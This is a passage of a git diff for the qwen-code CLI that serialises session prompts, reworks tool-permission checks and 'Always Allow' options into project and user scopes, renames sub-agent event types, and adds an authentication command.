'../config/config.js'; import { Session } from './session/Session.js'; -import type { ApprovalModeValue } from './session/types.js'; import { formatAcpModelId } from '../utils/acpModelUtils.js'; const debugLogger = createDebugLogger('ACP_AGENT'); diff --git a/packages/cli/src/acp-integration/service/filesystem.test.ts b/packages/cli/src/acp-integration/service/filesystem.test.ts index 2ff8e2b6b..a8683c7c5 100644 --- a/packages/cli/src/acp-integration/service/filesystem.test.ts +++ b/packages/cli/src/acp-integration/service/filesystem.test.ts @@ -13,12 +13,10 @@ const RESOURCE_NOT_FOUND_CODE = -32002; const INTERNAL_ERROR_CODE = -32603; const createFallback = (): FileSystemService => ({ - readTextFile: vi - .fn() - .mockResolvedValue({ - content: '', - _meta: { bom: false, encoding: 'utf-8' }, - }), + readTextFile: vi.fn().mockResolvedValue({ + content: '', + _meta: { bom: false, encoding: 'utf-8' }, + }), writeTextFile: vi.fn().mockResolvedValue({ _meta: undefined }), findFiles: vi.fn().mockReturnValue([]), }); diff --git a/packages/cli/src/acp-integration/session/Session.ts b/packages/cli/src/acp-integration/session/Session.ts index 04b9c7292..0d8b05a71 100644 --- a/packages/cli/src/acp-integration/session/Session.ts +++ b/packages/cli/src/acp-integration/session/Session.ts @@ -16,7 +16,7 @@ import type { ToolCallConfirmationDetails, ToolResult, ChatRecord, - SubAgentEventEmitter, + AgentEventEmitter, } from '@qwen-code/qwen-code-core'; import { AuthType, @@ -34,6 +34,7 @@ import { TodoWriteTool, ExitPlanModeTool, readManyFiles, + ToolNames, } from '@qwen-code/qwen-code-core'; import { RequestError } from '@agentclientprotocol/sdk'; @@ -90,6 +91,14 @@ const debugLogger = createDebugLogger('SESSION'); */ export class Session implements SessionContext { private pendingPrompt: AbortController | null = null; + /** + * Tracks the completion of the current prompt so that the next prompt + * can await it. 
This prevents a new prompt from reading chat history + * before the previous prompt's tool results have been added — + * a race condition that causes malformed history on Windows where + * process termination is slow. + */ + private pendingPromptCompletion: Promise | null = null; private turn: number = 0; // Modular components @@ -143,10 +152,43 @@ export class Session implements SessionContext { } async prompt(params: PromptRequest): Promise { + // Install this prompt's AbortController before awaiting the previous + // prompt, so that a session/cancel during the wait targets us. this.pendingPrompt?.abort(); const pendingSend = new AbortController(); this.pendingPrompt = pendingSend; + // Wait for the previous prompt to finish so chat history is consistent. + if (this.pendingPromptCompletion) { + try { + await this.pendingPromptCompletion; + } catch { + // Expected: previous prompt was cancelled or errored + } + } + + // Cancelled while waiting for the previous prompt to finish. + if (pendingSend.signal.aborted) { + return { stopReason: 'cancelled' }; + } + + // Track this prompt's completion for the next prompt to await + let resolveCompletion!: () => void; + this.pendingPromptCompletion = new Promise((resolve) => { + resolveCompletion = resolve; + }); + + try { + return await this.#executePrompt(params, pendingSend); + } finally { + resolveCompletion(); + } + } + + async #executePrompt( + params: PromptRequest, + pendingSend: AbortController, + ): Promise { // Increment turn counter for each user prompt this.turn += 1; @@ -489,7 +531,7 @@ export class Session implements SessionContext { // Access eventEmitter from TaskTool invocation const taskEventEmitter = ( invocation as { - eventEmitter: SubAgentEventEmitter; + eventEmitter: AgentEventEmitter; } ).eventEmitter; @@ -498,7 +540,7 @@ export class Session implements SessionContext { const subagentType = (args['subagent_type'] as string) ?? 
''; // Create a SubAgentTracker for this tool execution - const subAgentTracker = new SubAgentTracker( + const subSubAgentTracker = new SubAgentTracker( this, this.client, parentToolCallId, @@ -506,24 +548,23 @@ export class Session implements SessionContext { ); // Set up sub-agent tool tracking - subAgentCleanupFunctions = subAgentTracker.setup( + subAgentCleanupFunctions = subSubAgentTracker.setup( taskEventEmitter, abortSignal, ); } - const confirmationDetails = - await invocation.shouldConfirmExecute(abortSignal); + // Use the new permission flow: getDefaultPermission + getConfirmationDetails + // ask_user_question must always go through confirmation even in YOLO mode + // so the user always has a chance to respond to questions. + const isAskUserQuestionTool = fc.name === ToolNames.ASK_USER_QUESTION; + const defaultPermission = + this.config.getApprovalMode() !== ApprovalMode.YOLO || + isAskUserQuestionTool + ? await invocation.getDefaultPermission() + : 'allow'; - // In YOLO mode, auto-approve everything except ask_user_question - // (the user must always have a chance to respond to questions) - const isAskUserQuestionTool = - confirmationDetails && confirmationDetails.type === 'ask_user_question'; - const effectiveConfirmationDetails = - this.config.getApprovalMode() === ApprovalMode.YOLO && - !isAskUserQuestionTool - ? 
false - : confirmationDetails; + const needsConfirmation = defaultPermission === 'ask'; // Check for plan mode enforcement - block non-read-only tools // but allow ask_user_question so users can answer clarification questions @@ -532,7 +573,7 @@ export class Session implements SessionContext { isPlanMode && !isExitPlanModeTool && !isAskUserQuestionTool && - effectiveConfirmationDetails + needsConfirmation ) { // In plan mode, block any tool that requires confirmation (write operations) return errorResponse( @@ -543,25 +584,35 @@ export class Session implements SessionContext { ); } - if (effectiveConfirmationDetails) { + if (defaultPermission === 'deny') { + return errorResponse( + new Error( + `Tool "${fc.name}" is denied: command substitution is not allowed for security reasons.`, + ), + ); + } + + if (needsConfirmation) { + const confirmationDetails = + await invocation.getConfirmationDetails(abortSignal); const content: ToolCallContent[] = []; - if (effectiveConfirmationDetails.type === 'edit') { + if (confirmationDetails.type === 'edit') { content.push({ type: 'diff', - path: effectiveConfirmationDetails.fileName, - oldText: effectiveConfirmationDetails.originalContent, - newText: effectiveConfirmationDetails.newContent, + path: confirmationDetails.fileName, + oldText: confirmationDetails.originalContent, + newText: confirmationDetails.newContent, }); } // Add plan content for exit_plan_mode - if (effectiveConfirmationDetails.type === 'plan') { + if (confirmationDetails.type === 'plan') { content.push({ type: 'content', content: { type: 'text', - text: effectiveConfirmationDetails.plan, + text: confirmationDetails.plan, }, }); } @@ -571,7 +622,7 @@ export class Session implements SessionContext { const params: RequestPermissionRequest = { sessionId: this.sessionId, - options: toPermissionOptions(effectiveConfirmationDetails), + options: toPermissionOptions(confirmationDetails), toolCall: { toolCallId: callId, status: 'pending', @@ -595,7 +646,7 @@ export class 
Session implements SessionContext { .nativeEnum(ToolConfirmationOutcome) .parse(output.outcome.optionId); - await effectiveConfirmationDetails.onConfirm(outcome, { + await confirmationDetails.onConfirm(outcome, { answers: output.answers, }); @@ -611,6 +662,8 @@ export class Session implements SessionContext { ); case ToolConfirmationOutcome.ProceedOnce: case ToolConfirmationOutcome.ProceedAlways: + case ToolConfirmationOutcome.ProceedAlwaysProject: + case ToolConfirmationOutcome.ProceedAlwaysUser: case ToolConfirmationOutcome.ProceedAlwaysServer: case ToolConfirmationOutcome.ProceedAlwaysTool: case ToolConfirmationOutcome.ModifyWithEditor: @@ -1000,8 +1053,13 @@ function toPermissionOptions( case 'exec': return [ { - optionId: ToolConfirmationOutcome.ProceedAlways, - name: `Always Allow ${confirmation.rootCommand}`, + optionId: ToolConfirmationOutcome.ProceedAlwaysProject, + name: `Always Allow in project: ${confirmation.rootCommand}`, + kind: 'allow_always', + }, + { + optionId: ToolConfirmationOutcome.ProceedAlwaysUser, + name: `Always Allow for user: ${confirmation.rootCommand}`, kind: 'allow_always', }, ...basicPermissionOptions, @@ -1009,13 +1067,13 @@ function toPermissionOptions( case 'mcp': return [ { - optionId: ToolConfirmationOutcome.ProceedAlwaysServer, - name: `Always Allow ${confirmation.serverName}`, + optionId: ToolConfirmationOutcome.ProceedAlwaysProject, + name: `Always Allow in project: ${confirmation.toolName}`, kind: 'allow_always', }, { - optionId: ToolConfirmationOutcome.ProceedAlwaysTool, - name: `Always Allow ${confirmation.toolName}`, + optionId: ToolConfirmationOutcome.ProceedAlwaysUser, + name: `Always Allow for user: ${confirmation.toolName}`, kind: 'allow_always', }, ...basicPermissionOptions, @@ -1023,8 +1081,13 @@ function toPermissionOptions( case 'info': return [ { - optionId: ToolConfirmationOutcome.ProceedAlways, - name: `Always Allow`, + optionId: ToolConfirmationOutcome.ProceedAlwaysProject, + name: `Always Allow in project`, + 
kind: 'allow_always', + }, + { + optionId: ToolConfirmationOutcome.ProceedAlwaysUser, + name: `Always Allow for user`, kind: 'allow_always', }, ...basicPermissionOptions, diff --git a/packages/cli/src/acp-integration/session/SubAgentTracker.test.ts b/packages/cli/src/acp-integration/session/SubAgentTracker.test.ts index 86832afdd..0be126ff4 100644 --- a/packages/cli/src/acp-integration/session/SubAgentTracker.test.ts +++ b/packages/cli/src/acp-integration/session/SubAgentTracker.test.ts @@ -10,26 +10,26 @@ import type { SessionContext } from './types.js'; import type { Config, ToolRegistry, - SubAgentEventEmitter, - SubAgentToolCallEvent, - SubAgentToolResultEvent, - SubAgentApprovalRequestEvent, - SubAgentStreamTextEvent, + AgentEventEmitter, + AgentToolCallEvent, + AgentToolResultEvent, + AgentApprovalRequestEvent, + AgentStreamTextEvent, ToolEditConfirmationDetails, ToolInfoConfirmationDetails, } from '@qwen-code/qwen-code-core'; import { - SubAgentEventType, + AgentEventType, ToolConfirmationOutcome, TodoWriteTool, } from '@qwen-code/qwen-code-core'; import type { AgentSideConnection } from '@agentclientprotocol/sdk'; import { EventEmitter } from 'node:events'; -// Helper to create a mock SubAgentToolCallEvent with required fields +// Helper to create a mock AgentToolCallEvent with required fields function createToolCallEvent( - overrides: Partial & { name: string; callId: string }, -): SubAgentToolCallEvent { + overrides: Partial & { name: string; callId: string }, +): AgentToolCallEvent { return { subagentId: 'test-subagent', round: 1, @@ -40,14 +40,14 @@ function createToolCallEvent( }; } -// Helper to create a mock SubAgentToolResultEvent with required fields +// Helper to create a mock AgentToolResultEvent with required fields function createToolResultEvent( - overrides: Partial & { + overrides: Partial & { name: string; callId: string; success: boolean; }, -): SubAgentToolResultEvent { +): AgentToolResultEvent { return { subagentId: 'test-subagent', 
round: 1, @@ -56,15 +56,15 @@ function createToolResultEvent( }; } -// Helper to create a mock SubAgentApprovalRequestEvent with required fields +// Helper to create a mock AgentApprovalRequestEvent with required fields function createApprovalEvent( - overrides: Partial & { + overrides: Partial & { name: string; callId: string; - confirmationDetails: SubAgentApprovalRequestEvent['confirmationDetails']; - respond: SubAgentApprovalRequestEvent['respond']; + confirmationDetails: AgentApprovalRequestEvent['confirmationDetails']; + respond: AgentApprovalRequestEvent['respond']; }, -): SubAgentApprovalRequestEvent { +): AgentApprovalRequestEvent { return { subagentId: 'test-subagent', round: 1, @@ -102,10 +102,10 @@ function createInfoConfirmation( }; } -// Helper to create a mock SubAgentStreamTextEvent with required fields +// Helper to create a mock AgentStreamTextEvent with required fields function createStreamTextEvent( - overrides: Partial & { text: string }, -): SubAgentStreamTextEvent { + overrides: Partial & { text: string }, +): AgentStreamTextEvent { return { subagentId: 'test-subagent', round: 1, @@ -120,7 +120,7 @@ describe('SubAgentTracker', () => { let sendUpdateSpy: ReturnType; let requestPermissionSpy: ReturnType; let tracker: SubAgentTracker; - let eventEmitter: SubAgentEventEmitter; + let eventEmitter: AgentEventEmitter; let abortController: AbortController; beforeEach(() => { @@ -151,7 +151,7 @@ describe('SubAgentTracker', () => { 'parent-call-123', 'test-subagent', ); - eventEmitter = new EventEmitter() as unknown as SubAgentEventEmitter; + eventEmitter = new EventEmitter() as unknown as AgentEventEmitter; abortController = new AbortController(); }); @@ -169,19 +169,19 @@ describe('SubAgentTracker', () => { tracker.setup(eventEmitter, abortController.signal); expect(onSpy).toHaveBeenCalledWith( - SubAgentEventType.TOOL_CALL, + AgentEventType.TOOL_CALL, expect.any(Function), ); expect(onSpy).toHaveBeenCalledWith( - SubAgentEventType.TOOL_RESULT, + 
AgentEventType.TOOL_RESULT, expect.any(Function), ); expect(onSpy).toHaveBeenCalledWith( - SubAgentEventType.TOOL_WAITING_APPROVAL, + AgentEventType.TOOL_WAITING_APPROVAL, expect.any(Function), ); expect(onSpy).toHaveBeenCalledWith( - SubAgentEventType.STREAM_TEXT, + AgentEventType.STREAM_TEXT, expect.any(Function), ); }); @@ -193,19 +193,19 @@ describe('SubAgentTracker', () => { cleanups[0](); expect(offSpy).toHaveBeenCalledWith( - SubAgentEventType.TOOL_CALL, + AgentEventType.TOOL_CALL, expect.any(Function), ); expect(offSpy).toHaveBeenCalledWith( - SubAgentEventType.TOOL_RESULT, + AgentEventType.TOOL_RESULT, expect.any(Function), ); expect(offSpy).toHaveBeenCalledWith( - SubAgentEventType.TOOL_WAITING_APPROVAL, + AgentEventType.TOOL_WAITING_APPROVAL, expect.any(Function), ); expect(offSpy).toHaveBeenCalledWith( - SubAgentEventType.STREAM_TEXT, + AgentEventType.STREAM_TEXT, expect.any(Function), ); }); @@ -222,7 +222,7 @@ describe('SubAgentTracker', () => { description: 'Reading file', }); - eventEmitter.emit(SubAgentEventType.TOOL_CALL, event); + eventEmitter.emit(AgentEventType.TOOL_CALL, event); // Allow async operations to complete await vi.waitFor(() => { @@ -258,7 +258,7 @@ describe('SubAgentTracker', () => { args: { todos: [] }, }); - eventEmitter.emit(SubAgentEventType.TOOL_CALL, event); + eventEmitter.emit(AgentEventType.TOOL_CALL, event); // Give time for any async operation await new Promise((resolve) => setTimeout(resolve, 10)); @@ -276,7 +276,7 @@ describe('SubAgentTracker', () => { args: {}, }); - eventEmitter.emit(SubAgentEventType.TOOL_CALL, event); + eventEmitter.emit(AgentEventType.TOOL_CALL, event); await new Promise((resolve) => setTimeout(resolve, 10)); @@ -290,7 +290,7 @@ describe('SubAgentTracker', () => { // First emit tool call to store state eventEmitter.emit( - SubAgentEventType.TOOL_CALL, + AgentEventType.TOOL_CALL, createToolCallEvent({ name: 'read_file', callId: 'call-123', @@ -306,7 +306,7 @@ describe('SubAgentTracker', () => { 
resultDisplay: 'File contents', }); - eventEmitter.emit(SubAgentEventType.TOOL_RESULT, resultEvent); + eventEmitter.emit(AgentEventType.TOOL_RESULT, resultEvent); await vi.waitFor(() => { expect(sendUpdateSpy).toHaveBeenCalledWith( @@ -334,7 +334,7 @@ describe('SubAgentTracker', () => { resultDisplay: undefined, }); - eventEmitter.emit(SubAgentEventType.TOOL_RESULT, resultEvent); + eventEmitter.emit(AgentEventType.TOOL_RESULT, resultEvent); await vi.waitFor(() => { expect(sendUpdateSpy).toHaveBeenCalledWith( @@ -356,7 +356,7 @@ describe('SubAgentTracker', () => { // Store args via tool call eventEmitter.emit( - SubAgentEventType.TOOL_CALL, + AgentEventType.TOOL_CALL, createToolCallEvent({ name: TodoWriteTool.Name, callId: 'call-todo', @@ -377,7 +377,7 @@ describe('SubAgentTracker', () => { }), }); - eventEmitter.emit(SubAgentEventType.TOOL_RESULT, resultEvent); + eventEmitter.emit(AgentEventType.TOOL_RESULT, resultEvent); await vi.waitFor(() => { expect(sendUpdateSpy).toHaveBeenCalledWith({ @@ -393,7 +393,7 @@ describe('SubAgentTracker', () => { tracker.setup(eventEmitter, abortController.signal); eventEmitter.emit( - SubAgentEventType.TOOL_CALL, + AgentEventType.TOOL_CALL, createToolCallEvent({ name: 'test_tool', callId: 'call-cleanup', @@ -402,7 +402,7 @@ describe('SubAgentTracker', () => { ); eventEmitter.emit( - SubAgentEventType.TOOL_RESULT, + AgentEventType.TOOL_RESULT, createToolResultEvent({ name: 'test_tool', callId: 'call-cleanup', @@ -413,7 +413,7 @@ describe('SubAgentTracker', () => { // Emit another result for same callId - should not have stored args sendUpdateSpy.mockClear(); eventEmitter.emit( - SubAgentEventType.TOOL_RESULT, + AgentEventType.TOOL_RESULT, createToolResultEvent({ name: 'test_tool', callId: 'call-cleanup', @@ -447,7 +447,7 @@ describe('SubAgentTracker', () => { respond: respondSpy, }); - eventEmitter.emit(SubAgentEventType.TOOL_WAITING_APPROVAL, event); + eventEmitter.emit(AgentEventType.TOOL_WAITING_APPROVAL, event); await 
vi.waitFor(() => { expect(requestPermissionSpy).toHaveBeenCalled(); @@ -483,7 +483,7 @@ describe('SubAgentTracker', () => { respond: respondSpy, }); - eventEmitter.emit(SubAgentEventType.TOOL_WAITING_APPROVAL, event); + eventEmitter.emit(AgentEventType.TOOL_WAITING_APPROVAL, event); await vi.waitFor(() => { expect(respondSpy).toHaveBeenCalledWith( @@ -504,7 +504,7 @@ describe('SubAgentTracker', () => { respond: respondSpy, }); - eventEmitter.emit(SubAgentEventType.TOOL_WAITING_APPROVAL, event); + eventEmitter.emit(AgentEventType.TOOL_WAITING_APPROVAL, event); await vi.waitFor(() => { expect(respondSpy).toHaveBeenCalledWith(ToolConfirmationOutcome.Cancel); @@ -525,7 +525,7 @@ describe('SubAgentTracker', () => { respond: respondSpy, }); - eventEmitter.emit(SubAgentEventType.TOOL_WAITING_APPROVAL, event); + eventEmitter.emit(AgentEventType.TOOL_WAITING_APPROVAL, event); await vi.waitFor(() => { expect(respondSpy).toHaveBeenCalledWith(ToolConfirmationOutcome.Cancel); @@ -548,7 +548,7 @@ describe('SubAgentTracker', () => { respond: vi.fn(), }); - eventEmitter.emit(SubAgentEventType.TOOL_WAITING_APPROVAL, event); + eventEmitter.emit(AgentEventType.TOOL_WAITING_APPROVAL, event); await vi.waitFor(() => { expect(requestPermissionSpy).toHaveBeenCalled(); @@ -572,7 +572,7 @@ describe('SubAgentTracker', () => { text: 'Hello, this is a response from the model.', }); - eventEmitter.emit(SubAgentEventType.STREAM_TEXT, event); + eventEmitter.emit(AgentEventType.STREAM_TEXT, event); await vi.waitFor(() => { expect(sendUpdateSpy).toHaveBeenCalled(); @@ -593,15 +593,15 @@ describe('SubAgentTracker', () => { tracker.setup(eventEmitter, abortController.signal); eventEmitter.emit( - SubAgentEventType.STREAM_TEXT, + AgentEventType.STREAM_TEXT, createStreamTextEvent({ text: 'First chunk ' }), ); eventEmitter.emit( - SubAgentEventType.STREAM_TEXT, + AgentEventType.STREAM_TEXT, createStreamTextEvent({ text: 'Second chunk ' }), ); eventEmitter.emit( - SubAgentEventType.STREAM_TEXT, + 
AgentEventType.STREAM_TEXT, createStreamTextEvent({ text: 'Third chunk' }), ); @@ -640,7 +640,7 @@ describe('SubAgentTracker', () => { text: 'This should not be emitted', }); - eventEmitter.emit(SubAgentEventType.STREAM_TEXT, event); + eventEmitter.emit(AgentEventType.STREAM_TEXT, event); await new Promise((resolve) => setTimeout(resolve, 10)); @@ -655,7 +655,7 @@ describe('SubAgentTracker', () => { thought: true, }); - eventEmitter.emit(SubAgentEventType.STREAM_TEXT, event); + eventEmitter.emit(AgentEventType.STREAM_TEXT, event); await vi.waitFor(() => { expect(sendUpdateSpy).toHaveBeenCalled(); @@ -680,7 +680,7 @@ describe('SubAgentTracker', () => { thought: false, }); - eventEmitter.emit(SubAgentEventType.STREAM_TEXT, event); + eventEmitter.emit(AgentEventType.STREAM_TEXT, event); await vi.waitFor(() => { expect(sendUpdateSpy).toHaveBeenCalled(); @@ -705,7 +705,7 @@ describe('SubAgentTracker', () => { text: 'Default behavior text.', }); - eventEmitter.emit(SubAgentEventType.STREAM_TEXT, event); + eventEmitter.emit(AgentEventType.STREAM_TEXT, event); await vi.waitFor(() => { expect(sendUpdateSpy).toHaveBeenCalled(); diff --git a/packages/cli/src/acp-integration/session/SubAgentTracker.ts b/packages/cli/src/acp-integration/session/SubAgentTracker.ts index acbe95082..6509b4a46 100644 --- a/packages/cli/src/acp-integration/session/SubAgentTracker.ts +++ b/packages/cli/src/acp-integration/session/SubAgentTracker.ts @@ -5,18 +5,18 @@ */ import type { - SubAgentEventEmitter, - SubAgentToolCallEvent, - SubAgentToolResultEvent, - SubAgentApprovalRequestEvent, - SubAgentUsageEvent, - SubAgentStreamTextEvent, + AgentEventEmitter, + AgentToolCallEvent, + AgentToolResultEvent, + AgentApprovalRequestEvent, + AgentUsageEvent, + AgentStreamTextEvent, ToolCallConfirmationDetails, AnyDeclarativeTool, AnyToolInvocation, } from '@qwen-code/qwen-code-core'; import { - SubAgentEventType, + AgentEventType, ToolConfirmationOutcome, createDebugLogger, } from '@qwen-code/qwen-code-core'; 
@@ -106,12 +106,12 @@ export class SubAgentTracker { /** * Sets up event listeners for a sub-agent's tool events. * - * @param eventEmitter - The SubAgentEventEmitter from TaskTool + * @param eventEmitter - The AgentEventEmitter from TaskTool * @param abortSignal - Signal to abort tracking if parent is cancelled * @returns Array of cleanup functions to remove listeners */ setup( - eventEmitter: SubAgentEventEmitter, + eventEmitter: AgentEventEmitter, abortSignal: AbortSignal, ): Array<() => void> { const onToolCall = this.createToolCallHandler(abortSignal); @@ -120,19 +120,19 @@ export class SubAgentTracker { const onUsageMetadata = this.createUsageMetadataHandler(abortSignal); const onStreamText = this.createStreamTextHandler(abortSignal); - eventEmitter.on(SubAgentEventType.TOOL_CALL, onToolCall); - eventEmitter.on(SubAgentEventType.TOOL_RESULT, onToolResult); - eventEmitter.on(SubAgentEventType.TOOL_WAITING_APPROVAL, onApproval); - eventEmitter.on(SubAgentEventType.USAGE_METADATA, onUsageMetadata); - eventEmitter.on(SubAgentEventType.STREAM_TEXT, onStreamText); + eventEmitter.on(AgentEventType.TOOL_CALL, onToolCall); + eventEmitter.on(AgentEventType.TOOL_RESULT, onToolResult); + eventEmitter.on(AgentEventType.TOOL_WAITING_APPROVAL, onApproval); + eventEmitter.on(AgentEventType.USAGE_METADATA, onUsageMetadata); + eventEmitter.on(AgentEventType.STREAM_TEXT, onStreamText); return [ () => { - eventEmitter.off(SubAgentEventType.TOOL_CALL, onToolCall); - eventEmitter.off(SubAgentEventType.TOOL_RESULT, onToolResult); - eventEmitter.off(SubAgentEventType.TOOL_WAITING_APPROVAL, onApproval); - eventEmitter.off(SubAgentEventType.USAGE_METADATA, onUsageMetadata); - eventEmitter.off(SubAgentEventType.STREAM_TEXT, onStreamText); + eventEmitter.off(AgentEventType.TOOL_CALL, onToolCall); + eventEmitter.off(AgentEventType.TOOL_RESULT, onToolResult); + eventEmitter.off(AgentEventType.TOOL_WAITING_APPROVAL, onApproval); + eventEmitter.off(AgentEventType.USAGE_METADATA, 
onUsageMetadata); + eventEmitter.off(AgentEventType.STREAM_TEXT, onStreamText); // Clean up any remaining states this.toolStates.clear(); }, @@ -146,7 +146,7 @@ export class SubAgentTracker { abortSignal: AbortSignal, ): (...args: unknown[]) => void { return (...args: unknown[]) => { - const event = args[0] as SubAgentToolCallEvent; + const event = args[0] as AgentToolCallEvent; if (abortSignal.aborted) return; // Look up tool and build invocation for metadata @@ -187,7 +187,7 @@ export class SubAgentTracker { abortSignal: AbortSignal, ): (...args: unknown[]) => void { return (...args: unknown[]) => { - const event = args[0] as SubAgentToolResultEvent; + const event = args[0] as AgentToolResultEvent; if (abortSignal.aborted) return; const state = this.toolStates.get(event.callId); @@ -215,7 +215,7 @@ export class SubAgentTracker { abortSignal: AbortSignal, ): (...args: unknown[]) => Promise { return async (...args: unknown[]) => { - const event = args[0] as SubAgentApprovalRequestEvent; + const event = args[0] as AgentApprovalRequestEvent; if (abortSignal.aborted) return; const state = this.toolStates.get(event.callId); @@ -292,7 +292,7 @@ export class SubAgentTracker { abortSignal: AbortSignal, ): (...args: unknown[]) => void { return (...args: unknown[]) => { - const event = args[0] as SubAgentUsageEvent; + const event = args[0] as AgentUsageEvent; if (abortSignal.aborted) return; this.messageEmitter.emitUsageMetadata( @@ -312,7 +312,7 @@ export class SubAgentTracker { abortSignal: AbortSignal, ): (...args: unknown[]) => void { return (...args: unknown[]) => { - const event = args[0] as SubAgentStreamTextEvent; + const event = args[0] as AgentStreamTextEvent; if (abortSignal.aborted) return; // Emit streamed text as agent message or thought based on the flag @@ -330,6 +330,8 @@ export class SubAgentTracker { private toPermissionOptions( confirmation: ToolCallConfirmationDetails, ): PermissionOption[] { + const hideAlwaysAllow = + 'hideAlwaysAllow' in confirmation 
&& confirmation.hideAlwaysAllow; switch (confirmation.type) { case 'edit': return [ @@ -342,34 +344,56 @@ export class SubAgentTracker { ]; case 'exec': return [ - { - optionId: ToolConfirmationOutcome.ProceedAlways, - name: `Always Allow ${(confirmation as { rootCommand?: string }).rootCommand ?? 'command'}`, - kind: 'allow_always', - }, + ...(hideAlwaysAllow + ? [] + : [ + { + optionId: ToolConfirmationOutcome.ProceedAlwaysProject, + name: `Always Allow in project: ${(confirmation as { rootCommand?: string }).rootCommand ?? 'command'}`, + kind: 'allow_always' as const, + }, + { + optionId: ToolConfirmationOutcome.ProceedAlwaysUser, + name: `Always Allow for user: ${(confirmation as { rootCommand?: string }).rootCommand ?? 'command'}`, + kind: 'allow_always' as const, + }, + ]), ...basicPermissionOptions, ]; case 'mcp': return [ - { - optionId: ToolConfirmationOutcome.ProceedAlwaysServer, - name: `Always Allow ${(confirmation as { serverName?: string }).serverName ?? 'server'}`, - kind: 'allow_always', - }, - { - optionId: ToolConfirmationOutcome.ProceedAlwaysTool, - name: `Always Allow ${(confirmation as { toolName?: string }).toolName ?? 'tool'}`, - kind: 'allow_always', - }, + ...(hideAlwaysAllow + ? [] + : [ + { + optionId: ToolConfirmationOutcome.ProceedAlwaysProject, + name: `Always Allow in project: ${(confirmation as { toolName?: string }).toolName ?? 'tool'}`, + kind: 'allow_always' as const, + }, + { + optionId: ToolConfirmationOutcome.ProceedAlwaysUser, + name: `Always Allow for user: ${(confirmation as { toolName?: string }).toolName ?? 'tool'}`, + kind: 'allow_always' as const, + }, + ]), ...basicPermissionOptions, ]; case 'info': return [ - { - optionId: ToolConfirmationOutcome.ProceedAlways, - name: 'Always Allow', - kind: 'allow_always', - }, + ...(hideAlwaysAllow + ? 
[] + : [ + { + optionId: ToolConfirmationOutcome.ProceedAlwaysProject, + name: 'Always Allow in project', + kind: 'allow_always' as const, + }, + { + optionId: ToolConfirmationOutcome.ProceedAlwaysUser, + name: 'Always Allow for user', + kind: 'allow_always' as const, + }, + ]), ...basicPermissionOptions, ]; case 'plan': diff --git a/packages/cli/src/acp-integration/session/emitters/MessageEmitter.ts b/packages/cli/src/acp-integration/session/emitters/MessageEmitter.ts index 4b2bf82bf..c4e0b971c 100644 --- a/packages/cli/src/acp-integration/session/emitters/MessageEmitter.ts +++ b/packages/cli/src/acp-integration/session/emitters/MessageEmitter.ts @@ -5,6 +5,7 @@ */ import type { GenerateContentResponseUsageMetadata } from '@google/genai'; +import type { SubagentMeta } from '../types.js'; import type { Usage } from '@agentclientprotocol/sdk'; import { BaseEmitter } from './BaseEmitter.js'; @@ -77,7 +78,7 @@ export class MessageEmitter extends BaseEmitter { usageMetadata: GenerateContentResponseUsageMetadata, text: string = '', durationMs?: number, - subagentMeta?: import('../types.js').SubagentMeta, + subagentMeta?: SubagentMeta, ): Promise { const usage: Usage = { inputTokens: usageMetadata.promptTokenCount ?? 
0, diff --git a/packages/cli/src/commands/auth.ts b/packages/cli/src/commands/auth.ts new file mode 100644 index 000000000..b90795bc7 --- /dev/null +++ b/packages/cli/src/commands/auth.ts @@ -0,0 +1,77 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import type { CommandModule, Argv } from 'yargs'; +import { + handleQwenAuth, + runInteractiveAuth, + showAuthStatus, +} from './auth/handler.js'; +import { t } from '../i18n/index.js'; + +// Define subcommands separately +const qwenOauthCommand = { + command: 'qwen-oauth', + describe: t('Authenticate using Qwen OAuth'), + handler: async () => { + await handleQwenAuth('qwen-oauth', {}); + }, +}; + +const codePlanCommand = { + command: 'coding-plan', + describe: t('Authenticate using Alibaba Cloud Coding Plan'), + builder: (yargs: Argv) => + yargs + .option('region', { + alias: 'r', + describe: t('Region for Coding Plan (china/global)'), + type: 'string', + }) + .option('key', { + alias: 'k', + describe: t('API key for Coding Plan'), + type: 'string', + }), + handler: async (argv: { region?: string; key?: string }) => { + const region = argv['region'] as string | undefined; + const key = argv['key'] as string | undefined; + + // If region and key are provided, use them directly + if (region && key) { + await handleQwenAuth('coding-plan', { region, key }); + } else { + // Otherwise, prompt interactively + await handleQwenAuth('coding-plan', {}); + } + }, +}; + +const statusCommand = { + command: 'status', + describe: t('Show current authentication status'), + handler: async () => { + await showAuthStatus(); + }, +}; + +export const authCommand: CommandModule = { + command: 'auth', + describe: t( + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan', + ), + builder: (yargs: Argv) => + yargs + .command(qwenOauthCommand) + .command(codePlanCommand) + .command(statusCommand) + .demandCommand(0) // Don't require a subcommand + 
.version(false), + handler: async () => { + // This handler is for when no subcommand is provided - show interactive menu + await runInteractiveAuth(); + }, +}; diff --git a/packages/cli/src/commands/auth/handler.ts b/packages/cli/src/commands/auth/handler.ts new file mode 100644 index 000000000..1d03e9860 --- /dev/null +++ b/packages/cli/src/commands/auth/handler.ts @@ -0,0 +1,500 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import { + AuthType, + getErrorMessage, + type Config, + type ProviderModelConfig as ModelConfig, +} from '@qwen-code/qwen-code-core'; +import { writeStdoutLine, writeStderrLine } from '../../utils/stdioHelpers.js'; +import { t } from '../../i18n/index.js'; +import { + getCodingPlanConfig, + isCodingPlanConfig, + CodingPlanRegion, + CODING_PLAN_ENV_KEY, +} from '../../constants/codingPlan.js'; +import { getPersistScopeForModelSelection } from '../../config/modelProvidersScope.js'; +import { backupSettingsFile } from '../../utils/settingsUtils.js'; +import { loadSettings, type LoadedSettings } from '../../config/settings.js'; +import { loadCliConfig } from '../../config/config.js'; +import type { CliArgs } from '../../config/config.js'; +import { InteractiveSelector } from './interactiveSelector.js'; + +interface QwenAuthOptions { + region?: string; + key?: string; +} + +interface CodingPlanSettings { + region?: CodingPlanRegion; + version?: string; +} + +interface MergedSettingsWithCodingPlan { + security?: { + auth?: { + selectedType?: string; + }; + }; + codingPlan?: CodingPlanSettings; + model?: { + name?: string; + }; + modelProviders?: Record; + env?: Record; +} + +/** + * Handles the authentication process based on the specified command and options + */ +export async function handleQwenAuth( + command: 'qwen-oauth' | 'coding-plan', + options: QwenAuthOptions, +) { + try { + const settings = loadSettings(); + + // Create a minimal argv for config loading + const minimalArgv: CliArgs = 
